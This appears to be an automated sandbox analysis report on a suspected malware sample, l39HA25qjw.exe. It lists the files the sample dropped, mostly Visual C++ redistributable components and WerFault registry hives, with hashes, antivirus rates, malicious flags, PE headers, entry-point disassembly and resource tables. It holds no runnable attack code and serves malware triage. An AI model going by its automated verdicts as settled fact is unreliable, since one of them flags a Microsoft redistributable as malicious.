                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (c) .NET Foundation and contributors. All rights reserved. Licensed under the Microsoft Reciprocal License. See LICENSE.TXT file in the project root for full license information. -->......<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Heig
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):195600
                                                                                                                                                                                                                                Entropy (8bit):6.682530937585544
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:EAB9CAF4277829ABDF6223EC1EFA0EDD
                                                                                                                                                                                                                                SHA1:74862ECF349A9BEDD32699F2A7A4E00B4727543D
                                                                                                                                                                                                                                SHA-256:A4EFBDB2CE55788FFE92A244CB775EFD475526EF5B61AD78DE2BCDFADDAC7041
                                                                                                                                                                                                                                SHA-512:45B15ADE68E0A90EA7300AEB6DCA9BC9E347A63DBA5CE72A635957564D1BDF0B1584A5E34191916498850FC7B3B7ECFBCBFCB246B39DBF59D47F66BC825C6FD2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..R...R...R..h.N..R..h.L.R..h.M..R.......R.......R.......R...*<..R...*,..R...R...S..K....R..K....R..N.@..R...R(..R..K....R..Rich.R..................PE..L......Z...........!................d.....................................................@..............................................................D......,.......T...............................@...............X............................text............................... ..`.rdata.............................@..@.data...............................@....gfids..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):650568
                                                                                                                                                                                                                                Entropy (8bit):7.2230397573160205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:D940EA062ED6E99F6D873C2F5F09D1C9
                                                                                                                                                                                                                                SHA1:6ABEC3341D3BCA045542C7B812947B55DDAF6B64
                                                                                                                                                                                                                                SHA-256:A0FCE2B6C865AE4F00145C9B366C39484DAF3160B526C77005E59F6F65ADB202
                                                                                                                                                                                                                                SHA-512:E4069E41311E8BD4599DE0A1BDF0EE0B76316359A0C83AC663C23DA8833E5DC0EFFA260FE8D0E47F4BEFA94C87FC7BF93BCE2B79792ABE8BEFC59ACF5401CFE1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p......Y~....@..............................................;..........0....(...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, 5636301 bytes, 14 files
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5646501
                                                                                                                                                                                                                                Entropy (8bit):7.997675176540837
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:BE501F118803C6B283E5743CB94D4F44
                                                                                                                                                                                                                                SHA1:A9530C227FB73F98D137E6C178F48C4FCB78A1DA
                                                                                                                                                                                                                                SHA-256:008CA0B47D627692050C2B7FD16BC670C2EA2A7541ED4CAD9ABD1675A481B6C5
                                                                                                                                                                                                                                SHA-512:DDB3F7913F45E9D9C757CBC7B75B7A65C3EB9BF429C97AD73E9B321849427617EA4A1FDC15CA5166A5417345552046C6BA043A8D14FF4FC61D58A1F38F288356
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:MSCF......V.....D.............................V..'..............o.....U........T.. .mfc140.dll.......U....T.. .mfc140chs.dll.....@MV....T.. .mfc140cht.dll.......V....T.. .mfc140deu.dll.......W....T.. .mfc140enu.dll.......X....T.. .mfc140esn.dll.......Y....T.. .mfc140fra.dll.....P.[....T.. .mfc140ita.dll.......\....T.. .mfc140jpn.dll.......\....T.. .mfc140kor.dll.....8.]....T.. .mfc140rus.dll..3V..^....T.. .mfc140u.dll..Q..h......T.. .mfcm140.dll..Q.........T.. .mfcm140u.dll...w=.7..CK.:kxSU.;m..6....B. .)Xm.BQ....-Z^. XP..Q ..JiI;..3>.....`...+./(W.}.m..P.%...'.`.R.3w..srr.t.....|....^{...k.d..^e.....|..d.ca....a,i.$.i..w.....]0w.Rc.E/....X8k..E...s.K....-4.|.`..9....M~.....h.Y.6..mS2...Q.)..u.l.....M..u...>qS..M..-.|.M:..7..Q.i.E.....o....I.?5.p..+.?.....c.....<.........R.c..h..L..D..Q......H..d2..m...3.."y...c.}..}.1SZ...$?.f.a..h..A....GCQ..fZ.......!.pf....c.~.ysF..j..;.8`...'....126s........I.U.x%CE..d...Xr6lV.....,.....^..IG...h....< dL.....%...[.tI!<.
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, 894114 bytes, 11 files
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):904290
                                                                                                                                                                                                                                Entropy (8bit):7.996452097103788
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:C1F40B16E6DFD6C841C1F97524AC53F6
                                                                                                                                                                                                                                SHA1:7EAF1A916AC8498253A310EF30D6E2198F2C0555
                                                                                                                                                                                                                                SHA-256:A05B0138D3C22AF4593FEB5B4A3A55F92E4D958246BC4A87754EEE73E5E52600
                                                                                                                                                                                                                                SHA-512:B5ABA56C88D9375157954996CAE73E1D55FAAF956181A2EF8C1F62612DA91356454AD367AE5A5EB370D5C96CC27BF2B7D359F874A191C8913CFC3723B166EE6E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:MSCF............D................................'..............E..............T.. .concrt140.dll............T.. .msvcp140.dll..c..8......T.. .msvcp140_1.dll............T.. .msvcp140_2.dll............T.. .msvcp140_atomic_wait.dll..S.. ......T.. .msvcp140_codecvt_ids.dll..).........T.. .vcamp140.dll.....8+.....T.. .vccorlib140.dll......F.....T.. .vcomp140.dll.....x. ....T.. .vcruntime140.dll.....(.!....T.. .vcruntime140_1.dll....{B3..CK.[{\T..30:.:C.Nuo....H.P....@P>.G.z._..CQ.K.8.'..e.U.V..Fe7....<|"..$5=....E2..93g..........z|..k...:...H.!$.~.NB6..c!.......dS.}.7kR....5k.9;g..i/.3..=.j~v.9'w.y.lsB....s....GH.,.a.O>3......d....k....wm$....jv.......I..9.a.O.Tv.........2.Pn[&.'.2}q..N.8[..D.2..i&..........N..;x....!..#'.f.l.T.~.U....5?-..".S....`R.7... ...`.x....{.x0....Hv.....D,j....(.m....yV8N>!..{.....3}.u.!.S5L&y...Z.:...`N........`o:..lN.l.[I4...}.....D.o..u..f<?...G.+.......u$..?.P{.$..A.d/.P.R.tz..P.n#...vE..u...'x.9.P=r ...~g.m..W...0MO.XBmO...j..K.
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Additional Runtime - 14.32.31332., Template: x64;1033, Revision Number: {CCEC62E2-D343-4D90-AA20-D444B3BCF41F}, Create Time/Date: Fri Jun 10 21:15:48 2022, Last Saved Time/Date: Fri Jun 10 21:15:48 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):184320
                                                                                                                                                                                                                                Entropy (8bit):6.402742717359017
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:049E4621DBD5337AE926E067B6B442B5
                                                                                                                                                                                                                                SHA1:6DAE8D1D8106021C21B47B06765849E93F8E3359
                                                                                                                                                                                                                                SHA-256:F76E2807B845C49E15D8A41E3191716EAC9931467BFDD8366B60900B1FEF4235
                                                                                                                                                                                                                                SHA-512:46788A3C050508AC0868D8FC312A62724AE44D9F04F456075413D5A364B7152FAAB1027659435E39163952BB216B629AE77AB2F6A6B4318E8A8BB33F7D6413D3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.32.31332., Template: x64;1033, Revision Number: {20ED3096-9E22-4E8E-9324-164DCB895C9A}, Create Time/Date: Fri Jun 10 21:12:10 2022, Last Saved Time/Date: Fri Jun 10 21:12:10 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):184320
                                                                                                                                                                                                                                Entropy (8bit):6.394809317616259
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:61F974CF8F47F9A47760C3FB21A2CE3F
                                                                                                                                                                                                                                SHA1:16BA7BD668619F8E284BD7CBCE08FAD3CE97FCB9
                                                                                                                                                                                                                                SHA-256:78F2A39485D7B48733BC4767619BAA34310CF8F9DEDC120D054D0842EB4201EA
                                                                                                                                                                                                                                SHA-512:152A520FB24857AB0A834F1C94E0F7A21C1B998C71861843E37D55A2364A6730FAE2F3A02507941FF593A9C1C9F57018D9912BD0D80AB0B87D7B4158194B927C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):650568
                                                                                                                                                                                                                                Entropy (8bit):7.2230397573160205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:D940EA062ED6E99F6D873C2F5F09D1C9
                                                                                                                                                                                                                                SHA1:6ABEC3341D3BCA045542C7B812947B55DDAF6B64
                                                                                                                                                                                                                                SHA-256:A0FCE2B6C865AE4F00145C9B366C39484DAF3160B526C77005E59F6F65ADB202
                                                                                                                                                                                                                                SHA-512:E4069E41311E8BD4599DE0A1BDF0EE0B76316359A0C83AC663C23DA8833E5DC0EFFA260FE8D0E47F4BEFA94C87FC7BF93BCE2B79792ABE8BEFC59ACF5401CFE1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p......Y~....@..............................................;..........0....(...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2359296
                                                                                                                                                                                                                                Entropy (8bit):4.226461953029707
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:B64C7CA002FD1D7D22057CECAD84B359
                                                                                                                                                                                                                                SHA1:463468427DABEC4971B52819491E684E998834C3
                                                                                                                                                                                                                                SHA-256:9CF2C70C5BD9AC86B7FB38190E8DF60688C6EC3D2FACEB278032E8EF2BB2F653
                                                                                                                                                                                                                                SHA-512:6F219B967C742406E01FA3B6755D51622F9854C9AD077F7E7FA6A5E373D593F568547276F1EA93D5D0D3477750947F6B67B9C956FCF7ABA53F6F1A3AE566F845
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:regf........5.#.^................... ....P .....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm^..r.................................................................................................................................................................................................................................................................................................................................................T..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                Entropy (8bit):3.742769005479863
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:E260C6E3000BB34C43B4AC7BCA73B2CE
                                                                                                                                                                                                                                SHA1:71E46220013B4021D2C9BD0973A9DE53A21BD074
                                                                                                                                                                                                                                SHA-256:4A3A3E9880A591B6050F76372FB76240D8AECEFAD49556305B5CF7A797F67E91
                                                                                                                                                                                                                                SHA-512:3E0A7831C6290CA520A1D5CE44D973D0062AC2EFD6A7FD4A15C246FD77D43F4A63FD22C5D1CB21EA7F6BBEB15DA8A77ADBA6CF62E2E86FACFD53A06E6547F06B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:regf........5.#.^................... ....P .....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm^..r.................................................................................................................................................................................................................................................................................................................................................T..HvLE.N...........P .....x.B^.}!W....;@b................................hbin................5.#.^...........nk,....S...............................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk ....B........(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...................................Z.......................Root........lh..(.....A.....nk .J..B....
                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Entropy (8bit):7.930104229626641
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                File name:l39HA25qjw.exe
                                                                                                                                                                                                                                File size:817664
                                                                                                                                                                                                                                MD5:5417b1ca4da061fc9bb034627fbbda40
                                                                                                                                                                                                                                SHA1:77340a75abaea4f7c215670b76f813222d892a22
                                                                                                                                                                                                                                SHA256:b92419fed9d1c40328157fd0e937a1c891138590d4857de113c052b3148a0f8f
                                                                                                                                                                                                                                SHA512:249064ab297fe6a87c70075ddd8cb2d02902e3c6a5954dade36c35cc8b93ba1c9b9f5b9e55460bdfc183f9366a31f74f3763f7ace9cebf0ea0bf1bb3f3862bb3
                                                                                                                                                                                                                                SSDEEP:12288:YS7MFtdtT7/0jaLlwUoZvWZRDg3OWctlMVd/eAWqL0sJ4xy72TOOkLVBne5k:mXcjaLlRRqFcnMNWsz77Ln
                                                                                                                                                                                                                                TLSH:4D0512C355C54523EA3627B044FF098231337D922879A24E6699FCDC1AF3365A173BAB
                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Of.{...(...(...(.l.)...(.l.)...(.l.)...(.l.)...(...(...(.l.)...(.l\(...(.l.)...(Rich...(........PE..L...!V.:.................d.
                                                                                                                                                                                                                                Icon Hash:f88692b2a296ded4
                                                                                                                                                                                                                                Entrypoint:0x406a00
                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0x3A1E5621 [Fri Nov 24 11:50:57 2000 UTC]
                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                OS Version Major:10
                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                File Version Major:10
                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                Subsystem Version Major:10
                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                                                                                                                                                                                Signature Valid:
                                                                                                                                                                                                                                Signature Issuer:
                                                                                                                                                                                                                                Signature Validation Error:
                                                                                                                                                                                                                                Error Number:
                                                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                    Version:
                                                                                                                                                                                                                                    Thumbprint MD5:
                                                                                                                                                                                                                                    Thumbprint SHA-1:
                                                                                                                                                                                                                                    Thumbprint SHA-256:
                                                                                                                                                                                                                                    Serial:
                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    call 00007F924489B4F5h
                                                                                                                                                                                                                                    jmp 00007F924489ADF5h
                                                                                                                                                                                                                                    push 00000058h
                                                                                                                                                                                                                                    push 00407268h
                                                                                                                                                                                                                                    call 00007F924489B597h
                                                                                                                                                                                                                                    xor ebx, ebx
                                                                                                                                                                                                                                    mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                                                    lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                    call dword ptr [0040A184h]
                                                                                                                                                                                                                                    mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                                                    mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                                                    mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                                                    mov edi, ebx
                                                                                                                                                                                                                                    mov edx, 004088ACh
                                                                                                                                                                                                                                    mov ecx, esi
                                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                                    lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    je 00007F924489AE0Ah
                                                                                                                                                                                                                                    cmp eax, esi
                                                                                                                                                                                                                                    jne 00007F924489ADF9h
                                                                                                                                                                                                                                    xor esi, esi
                                                                                                                                                                                                                                    inc esi
                                                                                                                                                                                                                                    mov edi, esi
                                                                                                                                                                                                                                    jmp 00007F924489AE02h
                                                                                                                                                                                                                                    push 000003E8h
                                                                                                                                                                                                                                    call dword ptr [0040A188h]
                                                                                                                                                                                                                                    jmp 00007F924489ADC9h
                                                                                                                                                                                                                                    xor esi, esi
                                                                                                                                                                                                                                    inc esi
                                                                                                                                                                                                                                    cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                    jne 00007F924489ADFCh
                                                                                                                                                                                                                                    push 0000001Fh
                                                                                                                                                                                                                                    call 00007F924489B325h
                                                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                                                    jmp 00007F924489AE2Ch
                                                                                                                                                                                                                                    cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                                                    jne 00007F924489AE1Eh
                                                                                                                                                                                                                                    mov dword ptr [004088B0h], esi
                                                                                                                                                                                                                                    push 004010CCh
                                                                                                                                                                                                                                    push 004010C0h
                                                                                                                                                                                                                                    call 00007F924489AF50h
                                                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    je 00007F924489AE09h
                                                                                                                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                                                    mov eax, 000000FFh
                                                                                                                                                                                                                                    jmp 00007F924489AF29h
                                                                                                                                                                                                                                    mov dword ptr [004081E4h], esi
                                                                                                                                                                                                                                    cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                    jne 00007F924489AE0Dh
                                                                                                                                                                                                                                    push 004010BCh
                                                                                                                                                                                                                                    push 004010B4h
                                                                                                                                                                                                                                    call 00007F924489B4E3h
                                                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                                                    mov dword ptr [000088B0h], 00000000h
                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000xbf3d6.rsrc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xc0000xcf83c
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x150000x888.rsrc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xcc0000x0.reloc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                    .text0x10000x62c40x6400False0.57515625data6.30166106819433IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .idata0xa0000x10520x1200False0.4142795138888889data5.0224249304912405IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .rsrc0xc0000xbf3d60xbf400False0.9621272467320261data7.95575014996965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .reloc0xcc0000x8880xa00False0.7515625data6.273787441603385IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                    AVI0xc8780x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                                                                                                                                                                                                    RT_ICON0xf6940x2668dataEnglishUnited States
                                                                                                                                                                                                                                    RT_ICON0x11cfc0x1128dataEnglishUnited States
                                                                                                                                                                                                                                    RT_ICON0x12e240x9b8dataEnglishUnited States
                                                                                                                                                                                                                                    RT_ICON0x137dc0x6ccdataEnglishUnited States
                                                                                                                                                                                                                                    RT_ICON0x13ea80x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                    RT_DIALOG0x143100x2f2dataEnglishUnited States
                                                                                                                                                                                                                                    RT_DIALOG0x146040x1b0dataEnglishUnited States
                                                                                                                                                                                                                                    RT_DIALOG0x147b40x166dataEnglishUnited States
                                                                                                                                                                                                                                    RT_DIALOG0x1491c0x1c0dataEnglishUnited States
                                                                                                                                                                                                                                    RT_DIALOG0x14adc0x130dataEnglishUnited States
                                                                                                                                                                                                                                    RT_DIALOG0x14c0c0x120dataEnglishUnited States
                                                                                                                                                                                                                                    RT_STRING0x14d2c0x8cdataEnglishUnited States
                                                                                                                                                                                                                                    RT_STRING0x14db80x520dataEnglishUnited States
                                                                                                                                                                                                                                    RT_STRING0x152d80x5ccdataEnglishUnited States
                                                                                                                                                                                                                                    RT_STRING0x158a40x4b0dataEnglishUnited States
                                                                                                                                                                                                                                    RT_STRING0x15d540x44adataEnglishUnited States
                                                                                                                                                                                                                                    RT_STRING0x161a00x3cedataEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0x165700x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0x165780xb4261dataEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0xca7dc0x4dataEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0xca7e00x24dataEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0xca8040x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0xca80c0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0xca8140x4dataEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0xca8180x2fASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0xca8480x4dataEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0xca84c0x2eASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0xca87c0x4dataEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0xca8800x5ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0xca8880x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                    RT_RCDATA0xca8900x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                    RT_GROUP_ICON0xca8980x4cdataEnglishUnited States
                                                                                                                                                                                                                                    RT_VERSION0xca8e40x310dataRussianRussia
                                                                                                                                                                                                                                    RT_MANIFEST0xcabf40x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                                                                                    DLLImport
